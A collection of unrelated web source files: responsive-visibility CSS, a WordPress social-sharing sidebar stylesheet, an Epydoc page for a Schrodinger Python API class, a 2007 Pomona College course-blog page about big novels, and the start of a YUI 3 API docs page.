.visible-xs {
display: none !important;
}
tr.visible-xs {
display: none !important;
}
th.visible-xs,
td.visible-xs {
display: none !important;
}
@media (max-width: 767px) {
.visible-xs {
display: block !important;
}
tr.visible-xs {
display: table-row !important;
}
th.visible-xs,
td.visible-xs {
display: table-cell !important;
}
}
@media (min-width: 768px) and (max-width: 991px) {
.visible-xs.visible-sm {
display: block !important;
}
tr.visible-xs.visible-sm {
display: table-row !important;
}
th.visible-xs.visible-sm,
td.visible-xs.visible-sm {
display: table-cell !important;
}
}
@media (min-width: 992px) and (max-width: 1199px) {
.visible-xs.visible-md {
display: block !important;
}
tr.visible-xs.visible-md {
display: table-row !important;
}
th.visible-xs.visible-md,
td.visible-xs.visible-md {
display: table-cell !important;
}
}
@media (min-width: 1200px) {
.visible-xs.visible-lg {
display: block !important;
}
tr.visible-xs.visible-lg {
display: table-row !important;
}
th.visible-xs.visible-lg,
td.visible-xs.visible-lg {
display: table-cell !important;
}
}
.visible-sm {
display: none !important;
}
tr.visible-sm {
display: none !important;
}
th.visible-sm,
td.visible-sm {
display: none !important;
}
@media (max-width: 767px) {
.visible-sm.visible-xs {
display: block !important;
}
tr.visible-sm.visible-xs {
display: table-row !important;
}
th.visible-sm.visible-xs,
td.visible-sm.visible-xs {
display: table-cell !important;
}
}
@media (min-width: 768px) and (max-width: 991px) {
.visible-sm {
display: block !important;
}
tr.visible-sm {
display: table-row !important;
}
th.visible-sm,
td.visible-sm {
display: table-cell !important;
}
}
@media (min-width: 992px) and (max-width: 1199px) {
.visible-sm.visible-md {
display: block !important;
}
tr.visible-sm.visible-md {
display: table-row !important;
}
th.visible-sm.visible-md,
td.visible-sm.visible-md {
display: table-cell !important;
}
}
@media (min-width: 1200px) {
.visible-sm.visible-lg {
display: block !important;
}
tr.visible-sm.visible-lg {
display: table-row !important;
}
th.visible-sm.visible-lg,
td.visible-sm.visible-lg {
display: table-cell !important;
}
}
.visible-md {
display: none !important;
}
tr.visible-md {
display: none !important;
}
th.visible-md,
td.visible-md {
display: none !important;
}
@media (max-width: 767px) {
.visible-md.visible-xs {
display: block !important;
}
tr.visible-md.visible-xs {
display: table-row !important;
}
th.visible-md.visible-xs,
td.visible-md.visible-xs {
display: table-cell !important;
}
}
@media (min-width: 768px) and (max-width: 991px) {
.visible-md.visible-sm {
display: block !important;
}
tr.visible-md.visible-sm {
display: table-row !important;
}
th.visible-md.visible-sm,
td.visible-md.visible-sm {
display: table-cell !important;
}
}
@media (min-width: 992px) and (max-width: 1199px) {
.visible-md {
display: block !important;
}
tr.visible-md {
display: table-row !important;
}
th.visible-md,
td.visible-md {
display: table-cell !important;
}
}
@media (min-width: 1200px) {
.visible-md.visible-lg {
display: block !important;
}
tr.visible-md.visible-lg {
display: table-row !important;
}
th.visible-md.visible-lg,
td.visible-md.visible-lg {
display: table-cell !important;
}
}
.visible-lg {
display: none !important;
}
tr.visible-lg {
display: none !important;
}
th.visible-lg,
td.visible-lg {
display: none !important;
}
@media (max-width: 767px) {
.visible-lg.visible-xs {
display: block !important;
}
tr.visible-lg.visible-xs {
display: table-row !important;
}
th.visible-lg.visible-xs,
td.visible-lg.visible-xs {
display: table-cell !important;
}
}
@media (min-width: 768px) and (max-width: 991px) {
.visible-lg.visible-sm {
display: block !important;
}
tr.visible-lg.visible-sm {
display: table-row !important;
}
th.visible-lg.visible-sm,
td.visible-lg.visible-sm {
display: table-cell !important;
}
}
@media (min-width: 992px) and (max-width: 1199px) {
.visible-lg.visible-md {
display: block !important;
}
tr.visible-lg.visible-md {
display: table-row !important;
}
th.visible-lg.visible-md,
td.visible-lg.visible-md {
display: table-cell !important;
}
}
@media (min-width: 1200px) {
.visible-lg {
display: block !important;
}
tr.visible-lg {
display: table-row !important;
}
th.visible-lg,
td.visible-lg {
display: table-cell !important;
}
}
.hidden-xs {
display: block !important;
}
tr.hidden-xs {
display: table-row !important;
}
th.hidden-xs,
td.hidden-xs {
display: table-cell !important;
}
@media (max-width: 767px) {
.hidden-xs {
display: none !important;
}
tr.hidden-xs {
display: none !important;
}
th.hidden-xs,
td.hidden-xs {
display: none !important;
}
}
@media (min-width: 768px) and (max-width: 991px) {
.hidden-xs.hidden-sm {
display: none !important;
}
tr.hidden-xs.hidden-sm {
display: none !important;
}
th.hidden-xs.hidden-sm,
td.hidden-xs.hidden-sm {
display: none !important;
}
}
@media (min-width: 992px) and (max-width: 1199px) {
.hidden-xs.hidden-md {
display: none !important;
}
tr.hidden-xs.hidden-md {
display: none !important;
}
th.hidden-xs.hidden-md,
td.hidden-xs.hidden-md {
display: none !important;
}
}
@media (min-width: 1200px) {
.hidden-xs.hidden-lg {
display: none !important;
}
tr.hidden-xs.hidden-lg {
display: none !important;
}
th.hidden-xs.hidden-lg,
td.hidden-xs.hidden-lg {
display: none !important;
}
}
.hidden-sm {
display: block !important;
}
tr.hidden-sm {
display: table-row !important;
}
th.hidden-sm,
td.hidden-sm {
display: table-cell !important;
}
@media (max-width: 767px) {
.hidden-sm.hidden-xs {
display: none !important;
}
tr.hidden-sm.hidden-xs {
display: none !important;
}
th.hidden-sm.hidden-xs,
td.hidden-sm.hidden-xs {
display: none !important;
}
}
@media (min-width: 768px) and (max-width: 991px) {
.hidden-sm {
display: none !important;
}
tr.hidden-sm {
display: none !important;
}
th.hidden-sm,
td.hidden-sm {
display: none !important;
}
}
@media (min-width: 992px) and (max-width: 1199px) {
.hidden-sm.hidden-md {
display: none !important;
}
tr.hidden-sm.hidden-md {
display: none !important;
}
th.hidden-sm.hidden-md,
td.hidden-sm.hidden-md {
display: none !important;
}
}
@media (min-width: 1200px) {
.hidden-sm.hidden-lg {
display: none !important;
}
tr.hidden-sm.hidden-lg {
display: none !important;
}
th.hidden-sm.hidden-lg,
td.hidden-sm.hidden-lg {
display: none !important;
}
}
.hidden-md {
display: block !important;
}
tr.hidden-md {
display: table-row !important;
}
th.hidden-md,
td.hidden-md {
display: table-cell !important;
}
@media (max-width: 767px) {
.hidden-md.hidden-xs {
display: none !important;
}
tr.hidden-md.hidden-xs {
display: none !important;
}
th.hidden-md.hidden-xs,
td.hidden-md.hidden-xs {
display: none !important;
}
}
@media (min-width: 768px) and (max-width: 991px) {
.hidden-md.hidden-sm {
display: none !important;
}
tr.hidden-md.hidden-sm {
display: none !important;
}
th.hidden-md.hidden-sm,
td.hidden-md.hidden-sm {
display: none !important;
}
}
@media (min-width: 992px) and (max-width: 1199px) {
.hidden-md {
display: none !important;
}
tr.hidden-md {
display: none !important;
}
th.hidden-md,
td.hidden-md {
display: none !important;
}
}
@media (min-width: 1200px) {
.hidden-md.hidden-lg {
display: none !important;
}
tr.hidden-md.hidden-lg {
display: none !important;
}
th.hidden-md.hidden-lg,
td.hidden-md.hidden-lg {
display: none !important;
}
}
.hidden-lg {
display: block !important;
}
tr.hidden-lg {
display: table-row !important;
}
th.hidden-lg,
td.hidden-lg {
display: table-cell !important;
}
@media (max-width: 767px) {
.hidden-lg.hidden-xs {
display: none !important;
}
tr.hidden-lg.hidden-xs {
display: none !important;
}
th.hidden-lg.hidden-xs,
td.hidden-lg.hidden-xs {
display: none !important;
}
}
@media (min-width: 768px) and (max-width: 991px) {
.hidden-lg.hidden-sm {
display: none !important;
}
tr.hidden-lg.hidden-sm {
display: none !important;
}
th.hidden-lg.hidden-sm,
td.hidden-lg.hidden-sm {
display: none !important;
}
}
@media (min-width: 992px) and (max-width: 1199px) {
.hidden-lg.hidden-md {
display: none !important;
}
tr.hidden-lg.hidden-md {
display: none !important;
}
th.hidden-lg.hidden-md,
td.hidden-lg.hidden-md {
display: none !important;
}
}
@media (min-width: 1200px) {
.hidden-lg {
display: none !important;
}
tr.hidden-lg {
display: none !important;
}
th.hidden-lg,
td.hidden-lg {
display: none !important;
}
}
.visible-print {
display: none !important;
}
tr.visible-print {
display: none !important;
}
th.visible-print,
td.visible-print {
display: none !important;
}
@media print {
.visible-print {
display: block !important;
}
tr.visible-print {
display: table-row !important;
}
th.visible-print,
td.visible-print {
display: table-cell !important;
}
.hidden-print {
display: none !important;
}
tr.hidden-print {
display: none !important;
}
th.hidden-print,
td.hidden-print {
display: none !important;
}
}
.control_div {
position:absolute;
left:-2000px;
top:0px;
min-width:300px;
}
.break {
background: linear-gradient(135deg, #ECEDDC 25%, transparent 25%) -50px 0, linear-gradient(225deg, #ECEDDC 25%, transparent 25%) -50px 0, linear-gradient(315deg, #ECEDDC 25%, transparent 25%), linear-gradient(45deg, #ECEDDC 25%, transparent 25%);
background-size: 100px 100px;
background-color: #EC173A;
}
.disabled {
opacity: 0.4;
filter: alpha(opacity=40); /* msie */
}
|
wp-content/plugins/nextgen-facebook/css/sidebar-buttons.css
|
mangamike/spork
|
/* Save an empty style text box to reload the default example styles.
* These styles are provided as examples only - modifications may be
* necessary to customize the layout for your website. Social sharing
* buttons can be aligned vertically, horizontally, floated, etc.
*/
#ngfb-sidebar {
cursor:pointer;
text-align:center;
position:fixed;
z-index:99;
/* position 100px down from top and 10% from left */
top:100px;
left:10%;
/* position 15% down from top and 400px left of center
* by using the right margin to push sidebar left */
/* top:15%;
right:50%;
margin:0 400px 0 0; */
}
/* show a large sharing icon at the top */
#ngfb-sidebar-header {
width:72px;
height:72px;
/* modify the share icon for the sidebar here */
background-image:url("{{URLPATH}}images/share-icon-1.png");
background-repeat:no-repeat;
background-position:center;
}
/* hide the buttons by default and show/hide on hover/click */
#ngfb-sidebar-buttons {
width:0; /* hide by default */
height:0; /* hide by default */
overflow:hidden; /* hide by default */
border-style:none; /* hide by default */
/* create a shadowed box with a light grey background */
border-radius:5px;
background:none repeat scroll 0% 0% rgb(250, 250, 250);
box-shadow:0px 0px 5px rgb(120, 120, 120);
border-width:1px;
border-color:rgb(255, 255, 255);
}
/* pre-define the width and height of each button for faster load */
/* note: the large buttons with vertical counters are 55x65px */
#ngfb-sidebar .ngfb-buttons > div {
display:block;
text-align:center;
width:60px; /* button with large vertical counter */
height:65px; /* button with large vertical counter */
margin:10px 5px;
}
/* adjustments for specific buttons */
#ngfb-sidebar .ngfb-buttons div.pinterest-button { height:28px; margin-top:42px; }
#ngfb-sidebar .ngfb-buttons div.tumblr-button { height:20px; }
#ngfb-sidebar .ngfb-buttons div.reddit-button { margin-bottom:15px; }
|
Schrodinger/Schrodinger_2015-2_docs/python_api/api/schrodinger.application.mcpro.mc.DrawMcPanel-class.html
|
platinhom/ManualHom
|
<?xml version="1.0" encoding="ascii"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>schrodinger.application.mcpro.mc.DrawMcPanel</title>
<link rel="stylesheet" href="epydoc.css" type="text/css" />
<script type="text/javascript" src="epydoc.js"></script>
</head>
<body bgcolor="white" text="black" link="blue" vlink="#204080"
alink="#204080">
<!-- ==================== NAVIGATION BAR ==================== -->
<table class="navbar" border="0" width="100%" cellpadding="0"
bgcolor="#a0c0ff" cellspacing="0">
<tr valign="middle">
<!-- Tree link -->
<th> <a
href="module-tree.html">Trees</a> </th>
<!-- Index link -->
<th> <a
href="identifier-index.html">Indices</a> </th>
<!-- Help link -->
<th> <a
href="help.html">Help</a> </th>
<!-- Project homepage -->
<th class="navbar" align="right" width="100%">
<table border="0" cellpadding="0" cellspacing="0">
<tr><th class="navbar" align="center"
>2015-2Schrodinger Python API</th>
</tr></table></th>
</tr>
</table>
<table width="100%" cellpadding="0" cellspacing="0">
<tr valign="top">
<td width="100%">
<span class="breadcrumbs">
<a href="schrodinger-module.html">Package schrodinger</a> ::
<a href="schrodinger.application-module.html">Package application</a> ::
<a href="schrodinger.application.mcpro-module.html">Package mcpro</a> ::
<a href="schrodinger.application.mcpro.mc-module.html">Module mc</a> ::
Class DrawMcPanel
</span>
</td>
<td>
<table cellpadding="0" cellspacing="0">
<!-- hide/show private -->
<tr><td align="right"><span class="options">[<a href="javascript:void(0);" class="privatelink"
onclick="toggle_private();">hide private</a>]</span></td></tr>
<tr><td align="right"><span class="options"
>[<a href="frames.html" target="_top">frames</a
>] | <a href="schrodinger.application.mcpro.mc.DrawMcPanel-class.html"
target="_top">no frames</a>]</span></td></tr>
</table>
</td>
</tr>
</table>
<!-- ==================== CLASS DESCRIPTION ==================== -->
<h1 class="epydoc">Class DrawMcPanel</h1><p class="nomargin-top"></p>
<p>See initiator docstring.</p>
<!-- ==================== INSTANCE METHODS ==================== -->
<a name="section-InstanceMethods"></a>
<table class="summary" border="1" cellpadding="3"
cellspacing="0" width="100%" bgcolor="white">
<tr bgcolor="#70b0f0" class="table-header">
<td colspan="2" class="table-header">
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr valign="top">
<td align="left"><span class="table-header">Instance Methods</span></td>
<td align="right" valign="top"
><span class="options">[<a href="#section-InstanceMethods"
class="privatelink" onclick="toggle_private();"
>hide private</a>]</span></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="15%" align="right" valign="top" class="summary">
<span class="summary-type"> </span>
</td><td class="summary">
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr>
<td><span class="summary-sig"><a name="__init__"></a><span class="summary-sig-name">__init__</span>(<span class="summary-sig-arg">self</span>,
<span class="summary-sig-arg">master</span>)</span><br />
# Data from panel # miniEntry.get() Number of optimization
cycles (+ int) # miniMenu.get() Type of minimization
algorithm</td>
<td align="right" valign="top">
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="15%" align="right" valign="top" class="summary">
<span class="summary-type"> </span>
</td><td class="summary">
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr>
<td><span class="summary-sig"><a name="mcSolvDep"></a><span class="summary-sig-name">mcSolvDep</span>(<span class="summary-sig-arg">self</span>,
<span class="summary-sig-arg">isolv</span>)</span><br />
Function to enable the solvent panel to set dependencies on the mc
panel (1) Remove NVT/NPT option (2) pack_forget() solvent-only
stage isolv = 0 All options viewed isolv = 2 Remove (1) isolv
= 3,4 Remove (1) and (2) isolv = 1 isn't valid for FEP</td>
<td align="right" valign="top">
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="15%" align="right" valign="top" class="summary">
<span class="summary-type"> </span>
</td><td class="summary">
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr>
<td><span class="summary-sig"><a name="initEntry"></a><span class="summary-sig-name">initEntry</span>(<span class="summary-sig-arg">self</span>,
<span class="summary-sig-arg">variable</span>,
<span class="summary-sig-arg">init</span>)</span><br />
Method to initialize entryfields at their default values</td>
<td align="right" valign="top">
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="15%" align="right" valign="top" class="summary">
<span class="summary-type"> </span>
</td><td class="summary">
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr>
<td><span class="summary-sig"><a name="getSystemOpt"></a><span class="summary-sig-name">getSystemOpt</span>(<span class="summary-sig-arg">self</span>)</span><br />
Overloaded method to return current systemOpt value</td>
<td align="right" valign="top">
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="15%" align="right" valign="top" class="summary">
<span class="summary-type"> </span>
</td><td class="summary">
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr>
<td><span class="summary-sig"><a name="setDefaults"></a><span class="summary-sig-name">setDefaults</span>(<span class="summary-sig-arg">self</span>)</span><br />
Method to set defaults</td>
<td align="right" valign="top">
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="15%" align="right" valign="top" class="summary">
<span class="summary-type"> </span>
</td><td class="summary">
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr>
<td><span class="summary-sig"><a name="reset"></a><span class="summary-sig-name">reset</span>(<span class="summary-sig-arg">self</span>)</span><br />
Method to reset GUI</td>
<td align="right" valign="top">
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="15%" align="right" valign="top" class="summary">
<span class="summary-type"> </span>
</td><td class="summary">
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr>
<td><span class="summary-sig"><a name="settings"></a><span class="summary-sig-name">settings</span>(<span class="summary-sig-arg">self</span>)</span><br />
method to return a dictionary of job settings by name used in
mcpro_driver.py</td>
<td align="right" valign="top">
</td>
</tr>
</table>
</td>
</tr>
</table>
<!-- ==================== NAVIGATION BAR ==================== -->
<table class="navbar" border="0" width="100%" cellpadding="0"
bgcolor="#a0c0ff" cellspacing="0">
<tr valign="middle">
<!-- Tree link -->
<th> <a
href="module-tree.html">Trees</a> </th>
<!-- Index link -->
<th> <a
href="identifier-index.html">Indices</a> </th>
<!-- Help link -->
<th> <a
href="help.html">Help</a> </th>
<!-- Project homepage -->
<th class="navbar" align="right" width="100%">
<table border="0" cellpadding="0" cellspacing="0">
<tr><th class="navbar" align="center"
>2015-2Schrodinger Python API</th>
</tr></table></th>
</tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" width="100%%">
<tr>
<td align="left" class="footer">
Generated by Epydoc 3.0.1 on Sat May 9 06:31:20 2015
</td>
<td align="right" class="footer">
<a target="mainFrame" href="http://epydoc.sourceforge.net"
>http://epydoc.sourceforge.net</a>
</td>
</tr>
</table>
<script type="text/javascript">
<!--
// Private objects are initially displayed (because if
// javascript is turned off then we want them to be
// visible); but by default, we want to hide them. So hide
// them unless we have a cookie that says to show them.
checkCookie();
// -->
</script>
</body>
</html>
|
55-2007/taxonomy/term/106/index.html
|
kfitz/machines
|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>trash | The Big Novel</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="alternate" type="application/rss+xml" title="RSS - trash" href="0/feed/index.html" />
<link rel="shortcut icon" href="../../../misc/favicon.ico" type="image/x-icon" />
<style type="text/css" media="all">@import "../../../modules/node/node.css";</style>
<style type="text/css" media="all">@import "../../../modules/poll/poll.css";</style>
<style type="text/css" media="all">@import "../../../modules/system/defaults.css";</style>
<style type="text/css" media="all">@import "../../../modules/system/system.css";</style>
<style type="text/css" media="all">@import "../../../modules/user/user.css";</style>
<style type="text/css" media="all">@import "../../../sites/all/modules/tagadelic/tagadelic.css";</style>
<style type="text/css" media="all">@import "../../../sites/all/themes/newmedia/style.css";</style>
<!--[if IE 6]>
<style type="text/css" media="all">@import "../../../sites/all/themes/newmedia/ie-fixes/ie6.css";</style>
<![endif]-->
<!--[if lt IE 7.]>
<script defer type="text/javascript" src="../../../sites/all/themes/newmedia/ie-fixes/pngfix.js"></script>
<![endif]-->
</head>
<body>
<div id="page">
<!-- begin wrapper -->
<div id="container">
<!-- primary links -->
<!-- begin header -->
<div id="header">
<!-- site logo -->
<!-- end site logo -->
<!-- site name -->
<h1>
<a href="../../../index.html" title="Home">
The Big Novel </a>
</h1>
<!-- end site name -->
<!-- site slogan -->
<!-- end site slogan -->
<div id="menu">
<ul class="links-menu">
<li><a href="http://machines.plannedobsolescence.net" title="associate professor of english and media studies">kathleen fitzpatrick</a></li>
<li><a href="http://www.pomona.edu" title="in claremont, california">pomona college</a></li>
</ul> </div><!-- end primary links -->
</div><!-- end header -->
<!-- search box in nowhere land - NEEDS WORK-->
<!-- end search box -->
<!-- content -->
<!-- <div id="main">-->
<!-- begin main content -->
<div id="mainContent" style="width: 530px;">
<div class="breadcrumb"><div class="breadcrumb"><a href="../../../index.html">Home</a></div></div> <h1 class="pageTitle">trash</h1> <div class="node">
<h2 class="nodeTitle"><a href="../../../node/119/index.html">trash podcast</a></h2> <div class="submitted">By HarryLime - Posted on 19 February 2007 - 2:21am.</div>
<div class="taxonomy">Tagged: <ul class="links inline"><li class="first taxonomy_term_106"><a href="index.html" rel="tag" title="" class="taxonomy_term_106 active">trash</a></li>
<li class="last taxonomy_term_91"><a href="../91/index.html" rel="tag" title="" class="taxonomy_term_91">Underworld</a></li>
</ul></div> <div class="content"><p>just stumbled across an interesting trash story in my daily podcast digest, it starts at what I presume to be the Fresh Kills landfill</p>
<p>http://www.wnyc.org/shows/radiolab/episodes/2006/04/14</p>
<p>enjoy</p>
</div>
<div class="links"><ul class="links inline"><li class="first last blog_usernames_blog"><a href="../../../blog/4/index.html" title="Read HarryLime's latest blog entries." class="blog_usernames_blog">HarryLime's blog</a></li>
</ul></div> </div>
<a href="0/feed/index.html" class="feed-icon"><img src="../../../misc/feed.png" alt="Syndicate content" title="Syndicate content" width="16" height="16" /></a>
</div>
<!-- Begin Sidebars -->
<div id="sideBars-bg" style="width: 415px;">
<div id="sideBars" style="width: 415px;">
<!-- left sidebar -->
<div id="leftSidebar">
<div class="block block-block" id="block-block-3">
<h2 class="title"></h2>
<div class="content"><p><a href="../../../index.html">the big novel</a> is the spring 2007 course website for english 55 at pomona college in claremont, california.</p>
<p><a href="http://machines.plannedobsolescence.net">the professor</a><br />
<a href="../../../syllabus/index.html">the syllabus</a><br />
<a href="https://sakai.claremont.edu/portal/site/CX_mtg_26013">the sakai site</a><br />
<a href="../1/index.html">more information</a></p>
</div>
</div>
<div class="block block-tagadelic" id="block-tagadelic-1">
<h2 class="title">tags</h2>
<div class="content"><a href="../94/index.html" class="tagadelic level2" rel="tag">baseball</a>
<a href="../6/index.html" class="tagadelic level2" rel="tag">characters</a>
<a href="../95/index.html" class="tagadelic level2" rel="tag">Cold War</a>
<a href="../23/index.html" class="tagadelic level2" rel="tag">comedy</a>
<a href="../1/index.html" class="tagadelic level1" rel="tag">course information</a>
<a href="../225/index.html" class="tagadelic level6" rel="tag">Cryptonomicon</a>
<a href="../154/index.html" class="tagadelic level1" rel="tag">David Foster Wallace</a>
<a href="../102/index.html" class="tagadelic level2" rel="tag">death</a>
<a href="../158/index.html" class="tagadelic level2" rel="tag">drugs</a>
<a href="../3/index.html" class="tagadelic level6" rel="tag">Gravity's Rainbow</a>
<a href="../155/index.html" class="tagadelic level1" rel="tag">Hal</a>
<a href="../153/index.html" class="tagadelic level6" rel="tag">Infinite Jest</a>
<a href="../45/index.html" class="tagadelic level2" rel="tag">language</a>
<a href="../168/index.html" class="tagadelic level1" rel="tag">mario</a>
<a href="../56/index.html" class="tagadelic level2" rel="tag">motifs</a>
<a href="../57/index.html" class="tagadelic level1" rel="tag">names</a>
<a href="../17/index.html" class="tagadelic level2" rel="tag">narrative</a>
<a href="../140/index.html" class="tagadelic level1" rel="tag">Nick</a>
<a href="../118/index.html" class="tagadelic level1" rel="tag">paranoia</a>
<a href="../26/index.html" class="tagadelic level1" rel="tag">peace</a>
<a href="../29/index.html" class="tagadelic level1" rel="tag">quotes</a>
<a href="../11/index.html" class="tagadelic level1" rel="tag">Roger and Jessica</a>
<a href="../24/index.html" class="tagadelic level2" rel="tag">sex</a>
<a href="../7/index.html" class="tagadelic level2" rel="tag">Significant quotes</a>
<a href="../20/index.html" class="tagadelic level4" rel="tag">Slothrop</a>
<a href="../164/index.html" class="tagadelic level1" rel="tag">tennis</a>
<a href="../91/index.html" class="tagadelic level6" rel="tag">Underworld</a>
<a href="../12/index.html" class="tagadelic level2" rel="tag">war</a>
<a href="../101/index.html" class="tagadelic level2" rel="tag">waste</a>
<a href="../50/index.html" class="tagadelic level1" rel="tag">Zero</a>
<div class='more-link'><a href="../../../tagadelic/chunk/1/index.html">more tags</a></div></div>
</div>
<div class="block block-user" id="block-user-1">
<h2 class="title">Navigation</h2>
<div class="content">
<ul class="menu">
<li class="leaf"><a href="../../../tracker/index.html">Recent posts</a></li>
</ul>
</div>
</div>
</div>
<!-- right sidebar -->
<div id="rightSidebar">
<div class="block block-comment" id="block-comment-0">
<h2 class="title">Recent comments</h2>
<div class="content"><div class="item-list"><ul><li><a href="../../../node/337/index.html#comment-569">Didn't that article we read</a><br />3 years 51 weeks ago</li><li><a href="../../../node/325/index.html#comment-568">no, not just you! I copied</a><br />3 years 52 weeks ago</li><li><a href="../../../node/328/index.html#comment-567">I too used to think that the</a><br />3 years 52 weeks ago</li><li><a href="../../../node/328/index.html#comment-566">I was really put off by that</a><br />3 years 52 weeks ago</li><li><a href="../../../node/332/index.html#comment-565">Even our generation has</a><br />3 years 52 weeks ago</li><li><a href="../../../node/334/index.html#comment-564">Erdedy</a><br />3 years 52 weeks ago</li><li><a href="../../../node/328/index.html#comment-563">i had the same reaction
</a><br />3 years 52 weeks ago</li><li><a href="../../../node/328/index.html#comment-562">women as tools</a><br />4 years 15 hours ago</li><li><a href="../../../node/328/index.html#comment-561">females in all of these novels</a><br />4 years 18 hours ago</li><li><a href="../../../node/328/index.html#comment-560">sexpot</a><br />4 years 1 day ago</li></ul></div></div>
</div>
<div class="block block-block" id="block-block-1">
<h2 class="title"></h2>
<div class="content"><h3>Pynchon</h3>
<p><a href="http://www.pynchon.pomona.edu/">San Narciso Community College</a> (aka the Pomona Pynchon site)<br />
<a href="http://www.themodernword.com/pynchon/">Pynchon @ The Modern Word</a><br />
<a href="http://www.robotwisdom.com/jorn/tpportal.html">Pynchon @ Robot Wisdom</a><br />
<a href="http://www.ham.muohio.edu/~krafftjm/pynchon.html">Pynchon Notes</a><br />
<a href="http://www.waste.org/pynchon-l/">Pynchon-l</a></p>
<h3>DeLillo</h3>
<p><a href="http://perival.com/delillo/delillo.html">Don DeLillo's America</a><br />
<a href="http://www.k-state.edu/english/nelp/delillo/">The Don DeLillo Society</a></p>
<h3>Wallace</h3>
<p><a href="http://www.thehowlingfantods.com/dfw.htm">The Howling Fantods</a><br />
<a href="http://waste.org/mail/?list=wallace-l">Wallace-l</a></p>
<h3>Stephenson</h3>
<p><a href="http://www.nealstephenson.com/">The Author's website</a><br />
<a href="http://www.well.com/~neal/">The Author's old website</a><br />
<a href="http://www.cryptonomicon.com/">Cryptonomicon</a></p>
</div>
</div>
</div>
</div><!-- end sidebars -->
</div><!-- end sideBars-bg -->
<!-- footer -->
<div id="footer">
</div><!-- end footer -->
</div><!-- end container -->
</div><!-- end page -->
<!-- Start of StatCounter Code -->
<script type="text/javascript">
var sc_project=3034095;
var sc_invisible=1;
var sc_partition=33;
var sc_security="ec028fa0";
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter_xhtml.js"></script><noscript><div class="statcounter"><a class="statcounter" href="http://www.statcounter.com/"><img class="statcounter" src="http://c34.statcounter.com/3034095/0/ec028fa0/1/" alt="blog stats" /></a></div></noscript>
<!-- End of StatCounter Code -->
</body>
</html>
<!-- Localized -->
|
sites/all/libraries/yui/api/classes/Panel.html
|
artefactual-labs/trac
|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Panel - YUI 3</title>
<link rel="stylesheet" href="http://yui.yahooapis.com/3.7.0/build/cssgrids/cssgrids-min.css">
<link rel="stylesheet" href="../assets/vendor/prettify/prettify-min.css">
<link rel="stylesheet" href="../assets/css/main.css" id="site_styles">
<link rel="shortcut icon" type="image/png" href="../assets/favicon.png">
<script src="http://yui.yahooapis.com/combo?3.7.0/build/yui/yui-min.js"></script>
</head>
<body class="yui3-skin-sam">
<div id="doc">
<div id="hd" class="yui3-g header">
<div class="yui3-u-3-4">
<h1><img src="../assets/css/logo.png" title="YUI 3"></h1>
</div>
<div class="yui3-u-1-4 version">
<em>API Docs for: 3.7.3</em>
</div>
</div>
<div id="bd" class="yui3-g">
<div class="yui3-u-1-4">
<div id="docs-sidebar" class="sidebar apidocs">
<div id="api-list">
<h2 class="off-left">APIs</h2>
<div id="api-tabview" class="tabview">
<ul class="tabs">
<li><a href="#api-classes">Classes</a></li>
<li><a href="#api-modules">Modules</a></li>
</ul>
<div id="api-tabview-filter">
<input type="search" id="api-filter" placeholder="Type to filter APIs">
</div>
<div id="api-tabview-panel">
<ul id="api-classes" class="apis classes">
<li><a href="../classes/Anim.html">Anim</a></li>
<li><a href="../classes/App.html">App</a></li>
<li><a href="../classes/App.Base.html">App.Base</a></li>
<li><a href="../classes/App.Content.html">App.Content</a></li>
<li><a href="../classes/App.Transitions.html">App.Transitions</a></li>
<li><a href="../classes/App.TransitionsNative.html">App.TransitionsNative</a></li>
<li><a href="../classes/AreaSeries.html">AreaSeries</a></li>
<li><a href="../classes/AreaSplineSeries.html">AreaSplineSeries</a></li>
<li><a href="../classes/Array.html">Array</a></li>
<li><a href="../classes/ArrayList.html">ArrayList</a></li>
<li><a href="../classes/ArraySort.html">ArraySort</a></li>
<li><a href="../classes/AsyncQueue.html">AsyncQueue</a></li>
<li><a href="../classes/Attribute.html">Attribute</a></li>
<li><a href="../classes/AttributeCore.html">AttributeCore</a></li>
<li><a href="../classes/AttributeEvents.html">AttributeEvents</a></li>
<li><a href="../classes/AttributeExtras.html">AttributeExtras</a></li>
<li><a href="../classes/AttributeLite.html">AttributeLite</a></li>
<li><a href="../classes/AutoComplete.html">AutoComplete</a></li>
<li><a href="../classes/AutoCompleteBase.html">AutoCompleteBase</a></li>
<li><a href="../classes/AutoCompleteFilters.html">AutoCompleteFilters</a></li>
<li><a href="../classes/AutoCompleteHighlighters.html">AutoCompleteHighlighters</a></li>
<li><a href="../classes/AutoCompleteList.html">AutoCompleteList</a></li>
<li><a href="../classes/Axis.html">Axis</a></li>
<li><a href="../classes/AxisType.html">AxisType</a></li>
<li><a href="../classes/BarSeries.html">BarSeries</a></li>
<li><a href="../classes/Base.html">Base</a></li>
<li><a href="../classes/BaseCore.html">BaseCore</a></li>
<li><a href="../classes/BottomAxisLayout.html">BottomAxisLayout</a></li>
<li><a href="../classes/Button.html">Button</a></li>
<li><a href="../classes/ButtonCore.html">ButtonCore</a></li>
<li><a href="../classes/ButtonGroup.html">ButtonGroup</a></li>
<li><a href="../classes/ButtonPlugin.html">ButtonPlugin</a></li>
